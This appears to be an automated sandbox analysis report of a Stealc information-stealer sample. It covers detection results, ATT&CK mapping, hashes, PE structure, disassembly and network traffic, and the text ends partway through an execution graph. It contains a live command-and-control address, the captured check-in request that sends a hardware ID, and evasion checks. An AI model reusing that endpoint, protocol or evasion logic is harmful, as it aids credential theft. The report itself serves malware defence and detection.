                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.810000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.2050733563.0000000005260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2092013993.00000000015DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7096, type: MEMORYSTR
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts12
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem334
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://docs.rs/getrandom#nodejs-es-module-support0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.206/6c4adf523b719729.phptrue
                  		unknown
                  http://185.215.113.206/true
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://185.215.113.206/6c4adf523b719729.php/file.exe, 00000000.00000002.2092013993.000000000163D000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://185.215.113.206/6c4adf523b719729.phpm%Afile.exe, 00000000.00000002.2092013993.0000000001636000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        http://185.215.113.206file.exe, 00000000.00000002.2092013993.00000000015DE000.00000004.00000020.00020000.00000000.sdmptrue
                          		unknown
                          http://185.215.113.206/6c4adf523b719729.phpA%%file.exe, 00000000.00000002.2092013993.0000000001636000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            https://docs.rs/getrandom#nodejs-es-module-supportfile.exe, file.exe, 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2050733563.000000000528B000.00000004.00001000.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            185.215.113.206
                            		unknownPortugal
                            		206894WHOLESALECONNECTIONSNLtrue

                            General Information

                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1545325
                            Start date and time:2024-10-30 12:35:09 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 2m 59s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:2
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:file.exe
                            Detection:MAL
                            Classification:mal100.troj.evad.winEXE@1/0@0/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 80%
                            • Number of executed functions: 19
                            • Number of non-executed functions: 128
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Stop behavior analysis, all processes terminated

                            Warnings

                            • Exclude process from analysis (whitelisted): dllhost.exe
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • VT rate limit hit for: file.exe

                            Simulations

                            Behavior and APIs

                            No simulations

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            185.215.113.206file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                            • 185.215.113.206/
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.206/6c4adf523b719729.php
                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                            • 185.215.113.206/6c4adf523b719729.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.206/6c4adf523b719729.php
                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                            • 185.215.113.206/6c4adf523b719729.php
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.206/6c4adf523b719729.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.206/6c4adf523b719729.php
                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                            • 185.215.113.206/
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.206/6c4adf523b719729.php
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.206/6c4adf523b719729.php

                            Domains

                            No context

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                            • 185.215.113.16
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.206
                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                            • 185.215.113.206
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.206
                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                            • 185.215.113.16
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.206
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.206
                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                            • 185.215.113.16
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.206
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.206

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            No created / dropped files found

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.956694005960488
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:file.exe
                            File size:2'136'064 bytes
                            MD5:9ec79eac864343887ecdf94b7d236918
                            SHA1:d9eceb6242f24ec369d4b60a78b2c52c1947a5dd
                            SHA256:29fe5af75f0c521b5bea21d6e5158c96a139269e463b6e8ee1760ed5e1000f44
                            SHA512:4641108907c9e849032e7b64e49ced98632783a0bd407bc7eadf0a439779aab34d08ffa38f2c67f452e2fffcc65b55756c759279bb6c87de6e51efbc1840e643
                            SSDEEP:49152:SzlvinT9o1MUC9se9Z0R3pcGmzQQDhvRrFyXrRqd2Jvw:SzQW18N9OR3pQEOv7Ari
                            TLSH:62A533453F90E8F7C9F4443804B57BA7FABA3E15107DEA690CB48502994FEF453A886E
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g...

                            File Icon

                            Icon Hash:00928e8e8686b000

                            Static PE Info

                            General

                            Entrypoint:0xb2a000
                            Entrypoint Section:.taggant
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                            Time Stamp:0x671E6E38 [Sun Oct 27 16:45:44 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:1
                            File Version Major:5
                            File Version Minor:1
                            Subsystem Version Major:5
                            Subsystem Version Minor:1
                            Import Hash:2eabe9054cad5152567f0699947a2c5b

                            Entrypoint Preview

                            Instruction
                            jmp 00007F60748535AAh
                            pcmpeqd mm4, qword ptr [eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add cl, ch
                            add byte ptr [eax], ah
                            add byte ptr [eax], al
                            add byte ptr [ecx], al
                            or al, byte ptr [eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], dh
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [edx], cl
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [ecx], al
                            or al, byte ptr [eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [ecx], cl
                            add byte ptr [eax], 00000000h
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add ecx, dword ptr [edx]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al

                            Rich Headers

                            Programming Language:
                            • [C++] VS2010 build 30319
                            • [ASM] VS2010 build 30319
                            • [ C ] VS2010 build 30319
                            • [ C ] VS2008 SP1 build 30729
                            • [IMP] VS2008 SP1 build 30729
                            • [LNK] VS2010 build 30319

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x2e90500x64.idata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x2e91f80x8.idata
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            0x10000x2e70000x676002a655c2867d51175e5ed888df89b8e9funknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rsrc 0x2e80000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .idata 0x2e90000x10000x200049071433b9f7c843453337b0fd53002False0.1328125data0.8946074494647072IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            0x2ea0000x2a00000x2000b85d7f9677046122c6df9735e2e1a03unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            eysgbrhc0x58a0000x19f0000x19e8006155d4867fa8aa86202b6343fff660a9False0.9946271392490953data7.952388640493053IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            qcadwkiz0x7290000x10000x400ea94516f292cb03750668ed9c9c3fb86False0.7626953125data5.959904985744639IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .taggant0x72a0000x30000x220088701e527aa3548d6999f7f8727f5bbeFalse0.060546875DOS executable (COM)0.7806944237027881IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                            Imports

                            DLLImport
                            kernel32.dlllstrcpy

                            Network Behavior

                            Suricata IDS Alerts

                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                            2024-10-30T12:36:05.671519+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.549704185.215.113.20680TCP

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Oct 30, 2024 12:36:04.451453924 CET4970480192.168.2.5185.215.113.206
                            Oct 30, 2024 12:36:04.457070112 CET8049704185.215.113.206192.168.2.5
                            Oct 30, 2024 12:36:04.457151890 CET4970480192.168.2.5185.215.113.206
                            Oct 30, 2024 12:36:04.457324028 CET4970480192.168.2.5185.215.113.206
                            Oct 30, 2024 12:36:04.462714911 CET8049704185.215.113.206192.168.2.5
                            Oct 30, 2024 12:36:05.373420954 CET8049704185.215.113.206192.168.2.5
                            Oct 30, 2024 12:36:05.373528957 CET4970480192.168.2.5185.215.113.206
                            Oct 30, 2024 12:36:05.375977993 CET4970480192.168.2.5185.215.113.206
                            Oct 30, 2024 12:36:05.381371021 CET8049704185.215.113.206192.168.2.5
                            Oct 30, 2024 12:36:05.671427011 CET8049704185.215.113.206192.168.2.5
                            Oct 30, 2024 12:36:05.671519041 CET4970480192.168.2.5185.215.113.206
                            Oct 30, 2024 12:36:08.772938013 CET4970480192.168.2.5185.215.113.206

                            HTTP Request Dependency Graph

                            • 185.215.113.206

                            HTTP Packets

                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.549704185.215.113.206807096C:\Users\user\Desktop\file.exe
                            TimestampBytes transferredDirectionData
                            Oct 30, 2024 12:36:04.457324028 CET90OUTGET / HTTP/1.1
                            Host: 185.215.113.206
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Oct 30, 2024 12:36:05.373420954 CET203INHTTP/1.1 200 OK
                            Date: Wed, 30 Oct 2024 11:36:05 GMT
                            Server: Apache/2.4.41 (Ubuntu)
                            Content-Length: 0
                            Keep-Alive: timeout=5, max=100
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                            Oct 30, 2024 12:36:05.375977993 CET413OUTPOST /6c4adf523b719729.php HTTP/1.1
                            Content-Type: multipart/form-data; boundary=----GHDAAKJEGCFCAKEBKJJE
                            Host: 185.215.113.206
                            Content-Length: 211
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Data Raw: 2d 2d 2d 2d 2d 2d 47 48 44 41 41 4b 4a 45 47 43 46 43 41 4b 45 42 4b 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 33 33 41 32 46 46 45 38 41 34 32 39 33 36 30 35 30 34 37 36 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 41 41 4b 4a 45 47 43 46 43 41 4b 45 42 4b 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 41 41 4b 4a 45 47 43 46 43 41 4b 45 42 4b 4a 4a 45 2d 2d 0d 0a
                            Data Ascii: ------GHDAAKJEGCFCAKEBKJJEContent-Disposition: form-data; name="hwid"F133A2FFE8A42936050476------GHDAAKJEGCFCAKEBKJJEContent-Disposition: form-data; name="build"tale------GHDAAKJEGCFCAKEBKJJE--
                            Oct 30, 2024 12:36:05.671427011 CET210INHTTP/1.1 200 OK
                            Date: Wed, 30 Oct 2024 11:36:05 GMT
                            Server: Apache/2.4.41 (Ubuntu)
                            Content-Length: 8
                            Keep-Alive: timeout=5, max=99
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                            Data Raw: 59 6d 78 76 59 32 73 3d
                            Data Ascii: YmxvY2s=


                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            System Behavior

                            General

                            Target ID:0
                            Start time:07:36:01
                            Start date:30/10/2024
                            Path:C:\Users\user\Desktop\file.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\file.exe"
                            Imagebase:0x810000
                            File size:2'136'064 bytes
                            MD5 hash:9EC79EAC864343887ECDF94B7D236918
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2050733563.0000000005260000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2092013993.00000000015DE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:true

                            Disassembly

                            Reset < >

                              Execution Graph

                              Execution Coverage:3.1%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:3.5%
                              Total number of Nodes:1327
                              Total number of Limit Nodes:24
                              execution_graph 37523 826c90 37568 8122a0 37523->37568 37547 826d04 37548 82acc0 4 API calls 37547->37548 37549 826d0b 37548->37549 37550 82acc0 4 API calls 37549->37550 37551 826d12 37550->37551 37552 82acc0 4 API calls 37551->37552 37553 826d19 37552->37553 37554 82acc0 4 API calls 37553->37554 37555 826d20 37554->37555 37720 82abb0 37555->37720 37557 826dac 37724 826bc0 GetSystemTime 37557->37724 37558 826d29 37558->37557 37560 826d62 OpenEventA 37558->37560 37562 826d95 CloseHandle Sleep 37560->37562 37563 826d79 37560->37563 37565 826daa 37562->37565 37567 826d81 CreateEventA 37563->37567 37565->37558 37566 826db6 CloseHandle ExitProcess 37567->37557 37921 814610 37568->37921 37570 8122b4 37571 814610 2 API calls 37570->37571 37572 8122cd 37571->37572 37573 814610 2 API calls 37572->37573 37574 8122e6 37573->37574 37575 814610 2 API calls 37574->37575 37576 8122ff 37575->37576 37577 814610 2 API calls 37576->37577 37578 812318 37577->37578 37579 814610 2 API calls 37578->37579 37580 812331 37579->37580 37581 814610 2 API calls 37580->37581 37582 81234a 37581->37582 37583 814610 2 API calls 37582->37583 37584 812363 37583->37584 37585 814610 2 API calls 37584->37585 37586 81237c 37585->37586 37587 814610 2 API calls 37586->37587 37588 812395 37587->37588 37589 814610 2 API calls 37588->37589 37590 8123ae 37589->37590 37591 814610 2 API calls 37590->37591 37592 8123c7 37591->37592 37593 814610 2 API calls 37592->37593 37594 8123e0 37593->37594 37595 814610 2 API calls 37594->37595 37596 8123f9 37595->37596 37597 814610 2 API calls 37596->37597 37598 812412 37597->37598 37599 814610 2 API calls 37598->37599 37600 81242b 37599->37600 37601 814610 2 API calls 37600->37601 37602 812444 37601->37602 37603 814610 2 API calls 37602->37603 37604 81245d 37603->37604 37605 814610 2 API calls 37604->37605 37606 812476 37605->37606 37607 814610 2 API calls 37606->37607 37608 81248f 37607->37608 37609 814610 2 API calls 37608->37609 37610 8124a8 37609->37610 37611 814610 2 API calls 37610->37611 37612 8124c1 37611->37612 37613 814610 2 API calls 37612->37613 37614 8124da 37613->37614 37615 814610 2 API calls 37614->37615 37616 8124f3 37615->37616 37617 814610 2 API calls 37616->37617 37618 81250c 37617->37618 37619 814610 2 API calls 37618->37619 37620 812525 37619->37620 37621 814610 2 API calls 37620->37621 37622 81253e 37621->37622 37623 814610 2 API calls 37622->37623 37624 812557 37623->37624 37625 814610 2 API calls 37624->37625 37626 812570 37625->37626 37627 814610 2 API calls 37626->37627 37628 812589 37627->37628 37629 814610 2 API calls 37628->37629 37630 8125a2 37629->37630 37631 814610 2 API calls 37630->37631 37632 8125bb 37631->37632 37633 814610 2 API calls 37632->37633 37634 8125d4 37633->37634 37635 814610 2 API calls 37634->37635 37636 8125ed 37635->37636 37637 814610 2 API calls 37636->37637 37638 812606 37637->37638 37639 814610 2 API calls 37638->37639 37640 81261f 37639->37640 37641 814610 2 API calls 37640->37641 37642 812638 37641->37642 37643 814610 2 API calls 37642->37643 37644 812651 37643->37644 37645 814610 2 API calls 37644->37645 37646 81266a 37645->37646 37647 814610 2 API calls 37646->37647 37648 812683 37647->37648 37649 814610 2 API calls 37648->37649 37650 81269c 37649->37650 37651 814610 2 API calls 37650->37651 37652 8126b5 37651->37652 37653 814610 2 API calls 37652->37653 37654 8126ce 37653->37654 37655 829bb0 37654->37655 37926 829aa0 GetPEB 37655->37926 37657 829bb8 37658 829de3 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 37657->37658 37659 829bca 37657->37659 37660 829e44 GetProcAddress 37658->37660 37661 829e5d 37658->37661 37662 829bdc 21 API calls 37659->37662 37660->37661 37663 829e96 37661->37663 37664 829e66 GetProcAddress GetProcAddress 37661->37664 37662->37658 37665 829eb8 37663->37665 37666 829e9f GetProcAddress 37663->37666 37664->37663 37667 829ec1 GetProcAddress 37665->37667 37668 829ed9 37665->37668 37666->37665 37667->37668 37669 829ee2 GetProcAddress GetProcAddress 37668->37669 37670 826ca0 37668->37670 37669->37670 37671 82aa50 37670->37671 37672 82aa60 37671->37672 37673 826cad 37672->37673 37674 82aa8e lstrcpy 37672->37674 37675 8111d0 37673->37675 37674->37673 37676 8111e8 37675->37676 37677 811217 37676->37677 37678 81120f ExitProcess 37676->37678 37679 811160 GetSystemInfo 37677->37679 37680 811184 37679->37680 37681 81117c ExitProcess 37679->37681 37682 811110 GetCurrentProcess VirtualAllocExNuma 37680->37682 37683 811141 ExitProcess 37682->37683 37684 811149 37682->37684 37927 8110a0 VirtualAlloc 37684->37927 37687 811220 37931 828b40 37687->37931 37690 811249 37691 81129a 37690->37691 37692 811292 ExitProcess 37690->37692 37693 826a10 GetUserDefaultLangID 37691->37693 37694 826a32 37693->37694 37695 826a73 37693->37695 37694->37695 37696 826a43 ExitProcess 37694->37696 37697 826a61 ExitProcess 37694->37697 37698 826a57 ExitProcess 37694->37698 37699 826a6b ExitProcess 37694->37699 37700 826a4d ExitProcess 37694->37700 37701 811190 37695->37701 37702 827a70 3 API calls 37701->37702 37703 81119e 37702->37703 37704 8111cc 37703->37704 37705 8279e0 3 API calls 37703->37705 37708 8279e0 GetProcessHeap RtlAllocateHeap GetUserNameA 37704->37708 37706 8111b7 37705->37706 37706->37704 37707 8111c4 ExitProcess 37706->37707 37709 826cd0 37708->37709 37710 827a70 GetProcessHeap RtlAllocateHeap GetComputerNameA 37709->37710 37711 826ce3 37710->37711 37712 82acc0 37711->37712 37933 82aa20 37712->37933 37714 82acd1 lstrlen 37716 82acf0 37714->37716 37715 82ad28 37934 82aab0 37715->37934 37716->37715 37718 82ad0a lstrcpy lstrcat 37716->37718 37718->37715 37719 82ad34 37719->37547 37721 82abcb 37720->37721 37722 82ac1b 37721->37722 37723 82ac09 lstrcpy 37721->37723 37722->37558 37723->37722 37938 826ac0 37724->37938 37726 826c2e 37727 826c38 sscanf 37726->37727 37967 82ab10 37727->37967 37729 826c4a SystemTimeToFileTime SystemTimeToFileTime 37730 826c80 37729->37730 37731 826c6e 37729->37731 37733 825d60 37730->37733 37731->37730 37732 826c78 ExitProcess 37731->37732 37734 825d6d 37733->37734 37735 82aa50 lstrcpy 37734->37735 37736 825d7e 37735->37736 37969 82ab30 lstrlen 37736->37969 37739 82ab30 2 API calls 37740 825db4 37739->37740 37741 82ab30 2 API calls 37740->37741 37742 825dc4 37741->37742 37973 826680 37742->37973 37745 82ab30 2 API calls 37746 825de3 37745->37746 37747 82ab30 2 API calls 37746->37747 37748 825df0 37747->37748 37749 82ab30 2 API calls 37748->37749 37750 825dfd 37749->37750 37751 82ab30 2 API calls 37750->37751 37752 825e49 37751->37752 37982 8126f0 37752->37982 37760 825f13 37761 826680 lstrcpy 37760->37761 37762 825f25 37761->37762 37763 82aab0 lstrcpy 37762->37763 37764 825f42 37763->37764 37765 82acc0 4 API calls 37764->37765 37766 825f5a 37765->37766 37767 82abb0 lstrcpy 37766->37767 37768 825f66 37767->37768 37769 82acc0 4 API calls 37768->37769 37770 825f8a 37769->37770 37771 82abb0 lstrcpy 